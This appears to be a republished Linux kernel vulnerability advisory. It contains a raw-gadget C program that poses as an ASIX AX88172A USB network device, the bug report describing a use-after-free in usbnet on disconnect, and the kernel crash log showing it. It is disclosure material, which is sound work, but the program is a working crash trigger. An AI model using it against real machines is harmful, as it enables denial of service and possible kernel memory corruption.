Search the Community

Linux USB usbnet tells minidrivers to unbind while netdev is still up, causing use-after-free conditions. Download: GS20230313141819.tgz (10.7 KB) Mirror: usb-ax88172a.c // roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c // NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems. #include <err.h> #include <signal.h> #include <stdbool.h> #include <assert.h> #include <alloca.h> #include <errno.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/usb/cdc.h> #include <linux/usb/raw_gadget.h> #include <linux/mii.h> #include <linux/mdio.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static int usb_fd; #define errx(code, ...) { printf(__VA_ARGS__); printf("\n"); while (1) pause(); } struct usb_raw_control_event { struct usb_raw_event inner; struct usb_ctrlrequest ctrl; }; static struct usb_device_descriptor usb_device = { .bLength = USB_DT_DEVICE_SIZE, .bDescriptorType = USB_DT_DEVICE, .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */ .bDeviceClass = __constant_cpu_to_le16(USB_CLASS_COMM), // is this even used? .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */ /* "We are a very legit..." (checks notes) "ASIX 88172a demo board" (looks * back up) "and would like to help you get connected to the network!" */ .idVendor = __constant_cpu_to_le16(0x0b95), .idProduct = __constant_cpu_to_le16(0x172a), .iManufacturer = 1, .iProduct = 2, .iSerialNumber = 3, .bNumConfigurations = 1 }; struct usb_config_descriptor usb_config = { .bLength = USB_DT_CONFIG_SIZE, .bDescriptorType = USB_DT_CONFIG, .wTotalLength = 0, // fixed up later .bNumInterfaces = 1, .bConfigurationValue = 1, .iConfiguration = 4, .bmAttributes = USB_CONFIG_ATT_ONE |// must be set USB_CONFIG_ATT_SELFPOWER, .bMaxPower = 0 // no power draw from host }; struct usb_interface_descriptor usb_interface = { .bLength = USB_DT_INTERFACE_SIZE, .bDescriptorType = USB_DT_INTERFACE, .bInterfaceNumber = 0, .bAlternateSetting = 0, .bNumEndpoints = 3, .bInterfaceClass = USB_CLASS_COMM, // ? .bInterfaceSubClass = USB_CDC_SUBCLASS_ETHERNET, .bInterfaceProtocol = USB_CDC_PROTO_NONE, .iInterface = 5, }; struct usb_endpoint_descriptor usb_endpoint_in = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN | 1, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = 512, //.bInterval = 1 }; struct usb_endpoint_descriptor usb_endpoint_out = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_OUT | 1, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = 512, //.bInterval = 1 }; struct usb_endpoint_descriptor usb_endpoint_intr = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN | 2, .bmAttributes = USB_ENDPOINT_XFER_INT, .wMaxPacketSize = 8, .bInterval = 1 }; unsigned short intr_handle; void usb_reply(void *data, size_t len, size_t req_length) { printf(" REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length); if (len > req_length) len = req_length; struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len); io->ep = 0; io->flags = 0; io->length = len; memcpy(io->data, data, len); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io)); } void usb_reply_zero(size_t req_length) { char *data = alloca(req_length); memset(data, '\0', req_length); usb_reply(data, req_length, req_length); } void usb_get_and_ack(void *buf, size_t len, size_t req_length) { printf(" ACK OUT: req_length %lu\n", (unsigned long)req_length); struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length); memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length); io->ep = 0; io->flags = 0; io->length = req_length; //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length); int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io)); assert(ret_len == req_length); if (buf) { if (len > req_length) { memset(buf, '\0', len); len = req_length; } memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len); } } void usb_ack(size_t req_length) { usb_get_and_ack(NULL, 0, req_length); } void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) { printf(" descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr); assert(descr_len <= 255); assert(descr_len >= 2); assert(((unsigned char*)descr)[0] == descr_len); memcpy(buf + *buf_len, descr, descr_len); (*buf_len) += descr_len; ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len); } int state = 0; void handle_alarm(int sig) { if (state == 0) state = 1; } int main(int argc, char **argv) { setbuf(stdout, NULL); setbuf(stderr, NULL); usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR)); struct usb_raw_init init_args = { .speed = USB_SPEED_HIGH }; strcpy(init_args.driver_name, argv[1]); strcpy(init_args.device_name, argv[2]); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0)); struct sigaction alarm_act = { .sa_handler = handle_alarm, .sa_flags = 0 }; if (sigaction(SIGALRM, &alarm_act, NULL)) err(1, "sigaction"); //alarm(30); while (1) { if (state == 1) { printf("===================== BRINGING LINK UP =====================\n"); state = 2; struct { struct usb_raw_ep_io io; struct { /*ax88172_int_data*/ unsigned short res1; unsigned char link; unsigned short res2; unsigned char status; unsigned short res3; unsigned int intdata2; } __attribute__((packed)) data; } io_with_data = { .io = { .ep = intr_handle, .flags = 0, .length = sizeof(io_with_data.data) }, .data = { .link = 1 } }; SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io_with_data)); /* close(usb_fd); exit(0); */ } struct usb_raw_control_event control_ev = { .inner = { .type = 0, .length = sizeof(control_ev.ctrl) } }; int res = ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev); if (res == -1) { if (errno == EINTR) continue; err(1, "USB_RAW_IOCTL_EVENT_FETCH"); } if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) { // nothing to do } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) { unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength); bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0; printf("got control (in=%d, wLength=%u):\n", is_dir_in, req_length); switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) { case USB_TYPE_STANDARD: switch(control_ev.ctrl.bRequest) { case USB_REQ_GET_DESCRIPTOR: { unsigned descriptor_type = control_ev.ctrl.wValue >> 8; switch (descriptor_type) { case USB_DT_DEVICE: printf(" getting device descriptor\n"); usb_reply(&usb_device, sizeof(usb_device), req_length); break; case USB_DT_CONFIG: { printf(" getting dt config\n"); char dt_config[1024*128]; size_t dt_config_len = 0; descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config)); descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface)); descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE); descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE); descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE); usb_reply(dt_config, dt_config_len, req_length); } break; case USB_DT_STRING: { unsigned string_id = control_ev.ctrl.wValue & 0xff; printf(" getting string %d\n", string_id); if (string_id == 0) { unsigned char string_descr[] = { 4/*length*/, USB_DT_STRING, 0x09, 0x04 /* English - United States */ }; usb_reply(string_descr, sizeof(string_descr), req_length); } else { unsigned char string_descr[] = { 12/*length*/, USB_DT_STRING, 'D',0,'U',0,'M',0,'M',0,'Y',0 }; usb_reply(string_descr, sizeof(string_descr), req_length); } } break; default: errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type); } } break; case USB_REQ_SET_CONFIGURATION: { printf(" set configuration\n"); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out)); intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0)); usb_ack(req_length); } break; case USB_REQ_SET_INTERFACE: { printf(" set interface\n"); usb_ack(req_length); } break; default: errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest); } break; case USB_TYPE_CLASS: errx(1, "unknown class ctrlrequest"); case USB_TYPE_VENDOR: printf(" vendor ctrlrequest bRequest=0x%02hhx wValue=0x%04hx wIndex=0x%04hx wLength=0x%04hx\n", control_ev.ctrl.bRequest, control_ev.ctrl.wValue, control_ev.ctrl.wIndex, control_ev.ctrl.wLength); if (!is_dir_in) { usb_ack(req_length); continue; } switch (control_ev.ctrl.bRequest) { #if 1 case 0x01/*AX_ACCESS_MAC*/: { static unsigned char srom_addr; static const unsigned short ledvalue = (1<<15/*LED_VALID*/); printf(" AX_ACCESS_MAC\n"); switch (control_ev.ctrl.wValue) { case 0x02/*PHYSICAL_LINK_STATUS*/: { printf(" PHYSICAL_LINK_STATUS\n"); /* Linux checks AX_USB_SS and AX_USB_HS, influences URB size: * ->rx_urb_size * can be 0x5000 / 0x6000 / 0x6800 / 0x6800 * We prefer the smallest one (0x5000), which we get from * setting AX_USB_SS plus GMII_PHY_PHYSR_GIGA. */ unsigned char pl_status = 0x04; /*AX_USB_SS*/ usb_reply(&pl_status, sizeof(pl_status), req_length); } break; case 0x03/*GENERAL_STATUS*/: { printf(" GENERAL_STATUS\n"); unsigned short general_status = __cpu_to_le16(0x04/*AX_SECLD*/); usb_reply(&general_status, 2, req_length); } break; case 0x07/*AX_SROM_ADDR*/: { printf(" AX_SROM_ADDR\n"); usb_get_and_ack(&srom_addr, 1, req_length); printf(" SROM address: 0x%hhx\n", srom_addr); } break; case 0x08/*AX_SROM_DATA_LOW*/: { printf(" AX_SROM_DATA_LOW from 0x%hhx\n", srom_addr); if (srom_addr < 6) { unsigned char eeprom_head[12] = { /*0-5*/0, 0, 0, 0, 0, 0, // dontcare (first must not be FF) /*6-9*/0, 0, 0, 0, // checksummed /*10*/0xff // checksum }; usb_reply(eeprom_head + srom_addr*2, 2, req_length); } else if (srom_addr == 0x42) { unsigned char b = 8 & 0xff; usb_reply(&b, 1, req_length); } else { errx(1, "unhandled SROM range"); } } break; case 0x09/*AX_SROM_DATA_HIGH*/: { printf(" AX_SROM_DATA_HIGH from 0x%hhx\n", srom_addr); if (srom_addr == 0x42) { unsigned char b = ledvalue >> 8; usb_reply(&b, 1, req_length); } else { errx(1, "unhandled SROM range"); } } break; case 0x0a/*AX_SROM_CMD*/: { printf(" AX_SROM_CMD\n"); if (is_dir_in) { unsigned char value = 0; // EEP_BUSY would spin until timeout usb_reply(&value, 1, req_length); } else { usb_ack(req_length); } } break; case 0x0b/*AX_RX_CTL*/: { unsigned short ax_rx_ctl_value; usb_get_and_ack(&ax_rx_ctl_value, sizeof(ax_rx_ctl_value), req_length); printf(" AX_RX_CTL = 0x%04hx ################\n", ax_rx_ctl_value); } break; case 0x16/*AX_MULFLTARY*/: { printf(" AX_MULFLTARY ||||||||||||||||||||||||||||||||||||||||||\n"); usb_ack(req_length); if (state == 0) state = 1; } break; case 0x22/*AX_MEDIUM_STATUS_MODE*/: { printf(" AX_MEDIUM_STATUS_MODE\n"); usb_ack(req_length); } break; case 0x24/*AX_MONITOR_MOD*/: { printf(" AX_MONITOR_MOD\n"); usb_ack(req_length); } break; case 0x26/*AX_PHYPWR_RSTCTL*/: { printf(" AX_PHYPWR_RSTCTL\n"); usb_ack(req_length); } break; case 0x2e/*AX_RX_BULKIN_QCTRL*/: { printf(" AX_RX_BULKIN_QCTRL\n"); usb_ack(req_length); } break; case 0x34/*AX_RXCOE_CTL*/: { printf(" AX_RXCOE_CTL\n"); usb_ack(req_length); } break; case 0x35/*AX_TXCOE_CTL*/: { printf(" AX_TXCOE_CTL\n"); usb_ack(req_length); } break; case 0x54/*AX_PAUSE_WATERLVL_HIGH*/: { printf(" AX_PAUSE_WATERLVL_HIGH\n"); usb_ack(req_length); } break; case 0x55/*AX_PAUSE_WATERLVL_LOW*/: { printf(" AX_PAUSE_WATERLVL_LOW\n"); usb_ack(req_length); } break; case 0x73/*AX_LEDCTRL*/: { printf(" AX_LEDCTRL\n"); usb_ack(req_length); } break; case 0x33/*AX_CLOCK_SELECT*/: { printf(" AX_CLOCK_SELECT\n"); usb_ack(req_length); } break; case 0x10/*AX_NODE_ID*/: { printf(" AX_NODE_ID\n"); if (is_dir_in) { unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 }; usb_reply(mac_addr, sizeof(mac_addr), req_length); } else { usb_ack(req_length); } } break; default: if (is_dir_in) { errx(1, " unknown AX_ACCESS_MAC command 0x%02hhx", control_ev.ctrl.wValue); } else { printf(" ignoring unknown OUT AX_ACCESS_MAC command 0x%02hx\n", control_ev.ctrl.wValue); } } } break; case 0x02/*AX_ACCESS_PHY*/: { printf(" AX_ACCESS_PHY\n"); assert(control_ev.ctrl.wValue == 0x03/*AX88179_PHY_ID*/); static unsigned short mmd_id; static bool no_auto_increment; switch (control_ev.ctrl.wIndex) { case MII_BMCR: { /* Basic mode control register */ /* idk what any of these flags actually do in detail... */ printf(" MII_BMCR (basic mode control register)\n"); if (is_dir_in) { unsigned short bmcr_state = BMCR_SPEED1000 | BMCR_FULLDPLX; usb_reply(&bmcr_state, sizeof(bmcr_state), req_length); } else { usb_ack(req_length); } } break; case MII_MMD_CTRL: { printf(" MII_MMD_CTRL\n"); usb_get_and_ack(&mmd_id, 2, req_length); mmd_id &= ~0x4000; no_auto_increment = (mmd_id & 0x4000) != 0; printf(" set ID %d, no-auto-increment %d\n", mmd_id, no_auto_increment); } break; case MII_MMD_DATA: { printf(" MII_MMD_DATA (at ID %d)\n", mmd_id); if (is_dir_in) { switch (mmd_id) { case MDIO_MMD_PCS: printf(" Physical Coding Sublayer\n"); // decoded via mmd_eee_cap_to_ethtool_sup_t() unsigned short eee_caps = MDIO_EEE_1000T; usb_reply(&eee_caps, sizeof(eee_caps), req_length); break; case MDIO_MMD_AN: printf(" Auto-Negotiation\n"); // WARNING: this is actually used in two different // contexts unsigned short eee_adv = MDIO_EEE_1000T; usb_reply(&eee_adv, sizeof(eee_adv), req_length); break; default: errx(1, "unknown ID %d", mmd_id); } } else { usb_ack(req_length); } } break; case MII_PHYADDR: { printf(" MII_PHYADDR\n"); usb_ack(req_length); } break; case 0x11/*GMII_PHY_PHYSR*/: { printf(" MII_PHY_PHYSR\n"); unsigned short physr = 0x0400/*GMII_PHY_PHYSR_LINK*/ | 0x8000/*GMII_PHY_PHYSR_GIGA*/; usb_reply(&physr, sizeof(physr), req_length); } break; case 0x1a/*GMII_LED_ACT*/: { printf(" GMII_LED_ACT\n"); if (is_dir_in) { unsigned short ledact = 0; usb_reply(&ledact, sizeof(ledact), req_length); } else { usb_ack(req_length); } } break; case 0x1c/*GMII_LED_LINK*/: { printf(" GMII_LED_LINK\n"); if (is_dir_in) { unsigned short ledlink = 0; usb_reply(&ledlink, sizeof(ledlink), req_length); } else { usb_ack(req_length); } } break; case 0x1e/*GMII_PHYPAGE*/: { printf(" GMII_PHYPAGE\n"); usb_ack(req_length); } break; case 0x1f/*GMII_PHY_PAGE_SELECT*/: { printf(" GMII_PHY_PAGE_SELECT\n"); usb_ack(req_length); } break; default: errx(1, " unknown AX_ACCESS_PHY command 0x%02hhx", control_ev.ctrl.wIndex); } } break; case 0x04/*AX_ACCESS_PHY*/: { unsigned eeprom_idx = (unsigned)control_ev.ctrl.wValue; printf(" AX_ACCESS_EEPROM at 0x%x\n", eeprom_idx); if (is_dir_in) { printf(" EEPROM read\n"); switch (eeprom_idx) { case 0x43: {/* autodetach */ unsigned short autodetach = 0xffff; usb_reply(&autodetach, sizeof(autodetach), req_length); } break; default: errx(1, "unhandled EEPROM offset"); } } else { printf(" ignoring EEPROM write\n"); usb_ack(req_length); } } break; case 0x81: { printf(" 0x81 TX FIFO check\n"); unsigned int tx_fifo_state = 0; usb_reply(&tx_fifo_state, sizeof(tx_fifo_state), req_length); } break; #endif case 0x13/*AX_CMD_READ_NODE_ID*/: { unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 }; usb_reply(mac_addr, sizeof(mac_addr), req_length); } break; case 0x21/*AX_CMD_SW_PHY_STATUS*/: case 0x1a/*AX_CMD_READ_MEDIUM_STATUS*/: case 0x0f/*AX_CMD_READ_RX_CTL*/: { usb_reply_zero(req_length); } break; case 0x19/*AX_CMD_READ_PHY_ID*/: { printf(" CMD_READ_PHY_ID\n"); unsigned short phy_id = 1; usb_reply(&phy_id, sizeof(phy_id), req_length); } break; case 0x09/*AX_CMD_STATMNGSTS_REG*/: { printf(" CMD_STATMNGSTS_REG\n"); unsigned char val = 0x01; /* AX_HOST_EN */ usb_reply(&val, sizeof(val), req_length); } break; case 0x07/*AX_CMD_READ_MII_REG*/: { printf(" CMD_READ_MII_REG\n"); /* unsigned char val = 0x01; usb_reply(&val, sizeof(val), req_length); */ switch (control_ev.ctrl.wIndex) { case MII_BMCR: { /* Basic mode control register */ /* idk what any of these flags actually do in detail... */ printf(" MII_BMCR (basic mode control register)\n"); unsigned short bmcr_state = BMCR_SPEED100 | BMCR_FULLDPLX; usb_reply(&bmcr_state, sizeof(bmcr_state), req_length); } break; case MII_BMSR: { /* Basic mode status register */ printf(" MII_BMSR (basic mode status register)\n"); /* say link is initially down */ unsigned short bmsr_state = ((state > 0) ? BMSR_LSTATUS : 0) | BMSR_100FULL; usb_reply(&bmsr_state, sizeof(bmsr_state), req_length); } break; case MII_ADVERTISE: { /* Advertisement control register */ printf(" MII_ADVERTISE\n"); unsigned short adv_state = ADVERTISE_100FULL; usb_reply(&adv_state, sizeof(adv_state), req_length); } break; case MII_LPA: { /* Link partner ability */ printf(" MII_LPA (Link partner ability)\n"); unsigned short lpa_state = LPA_100FULL; usb_reply(&lpa_state, sizeof(lpa_state), req_length); } break; case MII_PHYSID1: case MII_PHYSID2: { printf(" MII_PHYSID\n"); unsigned short physid = 1; usb_reply(&physid, sizeof(physid), req_length); } break; default: errx(1, " unknown READ_MII_REG command 0x%02hhx", control_ev.ctrl.wIndex); } } break; #if 0 case 0x10/*AX_CMD_WRITE_RX_CTL*/: { printf(" CMD_WRITE_RX_CTL = 0x%hx\n", control_ev.ctrl.wIndex); usb_ack(req_length); } break; case 0x16/*AX_CMD_WRITE_MULTI_FILTER*/: { printf(" CMD_WRITE_MULTI_FILTER\n"); usb_ack(req_length); } break; #endif default: if (is_dir_in) { errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest); } else { printf(" ignoring unknown vendor ctrlrequest 0x%02hx\n", control_ev.ctrl.bRequest); usb_ack(req_length); } } break; default: errx(1, "USB_TYPE_* unknown"); } } else { printf("unknown event, type 0x%x\n", (unsigned)control_ev.inner.type); } } } advisory-info.txt Linux USB: usbnet tells minidrivers to unbind while netdev is still up, causing UAFs I've been digging more into the usbnet code, and it's all really brittle. I keep hitting random KASAN splats while I'm just trying to normally bring up drivers (mainly when my fake USB device can't handle some request yet and exits, which results in a USB disconnect, and apparently usbnet tends to blow up a lot in various ways if you disconnect before the device is fully up, at least on a kernel with CONFIG_RCU_STRICT_GRACE_PERIOD=y). One particularly easy-to-trigger bug was introduced by commit 2c9d6c2b871d (\"usbnet: run unbind() before unregister_netdev()\"), first in v5.14. Before that commit, the driver_info->unbind() callback was the last call to the minidriver during USB disconnect, and so one of the things some minidrivers do there is to free memory associated with the device. But after that commit, the semantics of driver_info->unbind() are completely different: It is called at a point where the networking subsystem **has no idea** yet that the device is going down. The netdev might still be up, or in the middle of going up, or going down, or whatever else netdevs do; and so it is still possible that e.g. userspace sends some netlink message that results in a call to the minidriver's ->reset method, and then e.g. aqc111_reset() will try to access its freed dev->driver_priv, and you get UAF. I looked at this more, and it turns out that with another minidriver, you don't even need to race to cause a UAF: Simply disconnecting a USB device when it is currently up will reliably cause a UAF. This is the case with the driver in drivers/net/usb/ax88172a.c (described as \"ASIX AX88172A USB 2.0 Ethernet\"), which is only used for the USB device ID of some demo board, nothing else: /* ASIX 88172a demo board */ USB_DEVICE(0x0b95, 0x172a), .driver_info = (unsigned long) &ax88172a_info, (Even though this driver is only used for talking to some demo board, it is enabled in kconfig together with all the other ASIX devices using kconfig flag CONFIG_USB_NET_AX8817X, which is enabled on many kernels, including Debian, some Android kernels and Chrome OS. Android and Chrome OS are probably not affected by this one though, since they run sufficiently old kernels...) The call graph of how the UAF happens: usbnet_disconnect ax88172a_unbind (as driver_info->unbind) kfree(dev->driver_priv) unregister_netdev unregister_netdevice unregister_netdevice_queue unregister_netdevice_many dev_close_many __dev_close_many usbnet_stop (as ops->ndo_stop) ax88172a_stop (as driver_info->stop) [UAF access to dev->driver_priv] The driver_info->stop() handler tries to access data that was freed in driver_info->unbind(). This makes it pretty clear that the reordering in commit 2c9d6c2b871d broke stuff. I have no clue how to fix all this though. From what I can tell, there are two points during usbnet_disconnect() where the minidriver might want to get a callback: - When ->ndo_close() is invoked by the netdev code; at that point, the netdev is definitely down but hasn't been completely torn down yet. usbnet doesn't currently use ->ndo_open/->ndo_close at all. - In the spot where the driver_info->unbind callback used to happen before commit 2c9d6c2b871d. But I have no clue whether we need one or both of these, and which of the things the current ->unbind callbacks do have to happen at what time. commit 2c9d6c2b871d claims that the current ->unbind callback is too late for the minidriver to disconnect PHY, so I guess that should probably happen in ->ndo_close()? Maybe? This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-19. ==== kernel splats and reproduction instructions ==== On a system running a normal Debian experimental kernel (version 5.17.0-rc3-amd64 #1 Debian 5.17~rc3-1~exp1), this also happens. With slub_debug=PF (to make SLUB poison freed memory and do some extra consistency checks to make UAFs easier to see), I get this in dmesg when I attach a fake USB device (over real USB, using a NET2380 USB device-side controller on another machine), wait for a few seconds so that it can be brought up completely, and then disconnect it: [ 138.697877] usb 1-2: new high-speed USB device number 3 using xhci_hcd [ 138.852315] usb 1-2: New USB device found, idVendor=0b95, idProduct=172a, bcdDevice= 0.00 [ 138.856972] usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 138.861557] usb 1-2: Product: DUMMY [ 138.866016] usb 1-2: Manufacturer: DUMMY [ 138.870312] usb 1-2: SerialNumber: DUMMY [ 139.403344] asix 1-2:1.0 (unnamed net_device) (uninitialized): registered mdio bus usb-001:003 [ 139.404897] asix 1-2:1.0 eth1: register 'asix' at usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet, 00:12:34:56:78:90 [ 139.406292] usbcore: registered new interface driver asix [ 139.408747] usbcore: registered new interface driver cdc_ether [ 139.481399] asix 1-2:1.0 enx001234567890: renamed from eth1 [ 140.150427] asix 1-2:1.0 enx001234567890: Connected to phy usb-001:003:00 [ 149.299153] usb 1-2: USB disconnect, device number 3 [ 149.303077] asix 1-2:1.0 enx001234567890: unregister 'asix' usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet [ 149.306775] asix 1-2:1.0 enx001234567890: deregistering mdio bus usb-001:003 [ 149.314206] asix 1-2:1.0 enx001234567890: Disconnecting from phy kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk\\xa5%!LhH\\xf2/\\xa1ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ\\x80\\xe5W\\xe1\\xf9\\x99\\xff\\xff\\xe0#\u0561\\xff\\xff\\xff\\xff\\x80t\\xf0\\xc0\\xff\\xff\\xff\\xff\\x98XW\\x82\\xf9\\x99\\xff\\xff\\x80\\xb9[\\xe1\\xf9\\x99\\xff\\xff [ 149.315731] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6f43: 0000 [#1] PREEMPT SMP PTI [ 149.317234] CPU: 4 PID: 105 Comm: kworker/4:1 Tainted: G E 5.17.0-rc3-amd64 #1 Debian 5.17~rc3-1~exp1 [ 149.318815] Hardware name: [...] [ 149.320214] Workqueue: usb_hub_wq hub_event [usbcore] [ 149.321030] RIP: 0010:phy_stop+0x9/0xf0 [libphy] [ 149.321835] Code: 02 e0 eb d4 48 8b 0c dd 20 ed b9 c0 e9 33 ff ff ff 4c 89 f7 e8 68 a3 fa df eb c6 e8 11 ff 1a e0 90 0f 1f 44 00 00 41 54 55 53 <8b> 87 d8 03 00 00 4c 8b a7 28 05 00 00 8d 50 ff 83 fa 01 0f 86 af [ 149.322714] RSP: 0018:ffffb68a807efa58 EFLAGS: 00010246 [ 149.323560] RAX: 0000000000000000 RBX: ffff99f9e168e980 RCX: 0000000000000000 [ 149.324405] RDX: ffffb68a807efa08 RSI: ffffffffa15526f6 RDI: 6b6b6b6b6b6b6b6b [ 149.325251] RBP: ffff99f9e15bbb80 R08: 0000000000000000 R09: ffffb68a807ef758 [ 149.326128] R10: ffffb68a807ef750 R11: ffffffffa1cd1568 R12: 0000000000000000 [ 149.326965] R13: ffff99f9e168e980 R14: ffffb68a807efad0 R15: ffffb68a807efba0 [ 149.327800] FS: 0000000000000000(0000) GS:ffff99fc8f700000(0000) knlGS:0000000000000000 [ 149.328641] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 149.329482] CR2: 00007fc2351ba6f4 CR3: 00000002fb410001 CR4: 00000000001706e0 [ 149.330352] Call Trace: [ 149.331198] <TASK> [ 149.332030] ax88172a_stop.cold+0x20/0x2e [asix] [ 149.332857] usbnet_stop+0x64/0x140 [usbnet] [ 149.333676] __dev_close_many+0x9e/0x110 [ 149.334512] dev_close_many+0x8b/0x140 [ 149.335295] ? __slab_free+0xa0/0x330 [ 149.336059] unregister_netdevice_many+0x158/0x740 [ 149.336816] ? kfree+0x218/0x250 [ 149.337573] unregister_netdevice_queue+0xcb/0x110 [ 149.338361] unregister_netdev+0x18/0x20 [ 149.339112] usbnet_disconnect+0x59/0xb0 [usbnet] [ 149.339864] usb_unbind_interface+0x8a/0x270 [usbcore] [ 149.340616] __device_release_driver+0x22d/0x240 [ 149.341358] device_release_driver+0x24/0x30 [ 149.342112] bus_remove_device+0xd8/0x140 [ 149.342840] device_del+0x18b/0x3f0 [ 149.343573] ? kobject_put+0x91/0x1d0 [ 149.344307] usb_disable_device+0xc6/0x1e0 [usbcore] [ 149.345056] usb_disconnect.cold+0x7b/0x24d [usbcore] [ 149.345802] hub_event+0xc4c/0x1880 [usbcore] [ 149.346571] ? preempt_count_sub+0x81/0x90 [ 149.347313] process_one_work+0x1e5/0x3b0 [ 149.348055] ? rescuer_thread+0x370/0x370 [ 149.348795] worker_thread+0x50/0x3a0 [ 149.349531] ? rescuer_thread+0x370/0x370 [ 149.350292] kthread+0xe7/0x110 [ 149.351030] ? kthread_complete_and_exit+0x20/0x20 [ 149.351771] ret_from_fork+0x22/0x30 [ 149.352504] </TASK> [ 149.353234] Modules linked in: cdc_ether(E) asix(E) selftests(E) usbnet(E) mii(E) nfnetlink(E) rfkill(E) zstd(E) zstd_compress(E) zram(E) zsmalloc(E) intel_rapl_msr(E) intel_rapl_common(E) x86_pkg_temp_thermal(E) intel_powerclamp(E) coretemp(E) nls_ascii(E) nls_cp437(E) vfat(E) snd_hda_codec_realtek(E) kvm_intel(E) fat(E) snd_hda_codec_generic(E) snd_hda_codec_hdmi(E) ledtrig_audio(E) kvm(E) irqbypass(E) snd_hda_intel(E) crc32_pclmul(E) snd_intel_dspcfg(E) snd_intel_sdw_acpi(E) snd_hda_codec(E) iTCO_wdt(E) intel_pmc_bxt(E) iTCO_vendor_support(E) snd_hda_core(E) at24(E) mei_hdcp(E) watchdog(E) ghash_clmulni_intel(E) snd_hwdep(E) snd_pcm_oss(E) snd_mixer_oss(E) rapl(E) r8169(E) intel_cstate(E) intel_uncore(E) efi_pstore(E) pcspkr(E) realtek(E) snd_pcm(E) mdio_devres(E) i2c_i801(E) snd_timer(E) mei_me(E) i2c_smbus(E) snd(E) ehci_pci(E) sg(E) libphy(E) soundcore(E) ehci_hcd(E) mei(E) lpc_ich(E) button(E) msr(E) parport_pc(E) ppdev(E) parport(E) fuse(E) configfs(E) efivarfs(E) ip_tables(E) [ 149.353267] x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) dm_crypt(E) dm_mod(E) raid10(E) raid456(E) libcrc32c(E) crc32c_generic(E) async_raid6_recov(E) async_memcpy(E) async_pq(E) async_xor(E) xor(E) async_tx(E) raid6_pq(E) raid1(E) raid0(E) multipath(E) linear(E) md_mod(E) hid_generic(E) usbhid(E) hid(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) evdev(E) crc32c_intel(E) i915(E) i2c_algo_bit(E) ahci(E) xhci_pci(E) libahci(E) drm_kms_helper(E) xhci_hcd(E) cec(E) rc_core(E) libata(E) ttm(E) aesni_intel(E) crypto_simd(E) 